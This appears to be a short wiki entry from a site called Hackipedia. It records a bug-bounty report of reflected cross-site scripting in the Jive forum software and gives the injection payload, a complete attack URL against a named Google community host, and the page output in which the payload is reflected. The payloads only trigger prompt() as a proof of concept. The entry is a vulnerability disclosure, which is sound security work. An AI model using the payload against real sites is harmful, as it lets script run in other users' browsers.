Reflective XSS on Jive forums

From Hackipedia
Jump to: navigation, search
OpenBugBounty #146003
Target: Google
Target Module: Jive Forum
Type: XSS
Original Link
Payload "></option>< /select><body/onpageshow=prompt()>"><svg/onload=prompt('1')>

Spam404's scanner found a reflected XSS in Jive's 3rd party forum application. The vulnerable area is a search posts by tag page.

The impact of this bug was far reaching as the forum software can be purchased for use or used as a service via jiveon.com. Looking at the blog post Link Some of the sites impacted where McAfee, GoogleEnterprise, Intel, Wells Fargo, and Bank Of America.

There are still instances of this XSS in the wild today

Attack URL:

https://connect.googleforwork.com/community/applicants/apps/english/cr edit-check/tags?tags="></option></select><body/onpageshow=prompt()>"><svg/onload=prompt(/XSSPOSED/)>

Result:

<div id="jive-body" class="clearfix">"><svg/onload=prompt(/XSSPOSED/)>"/>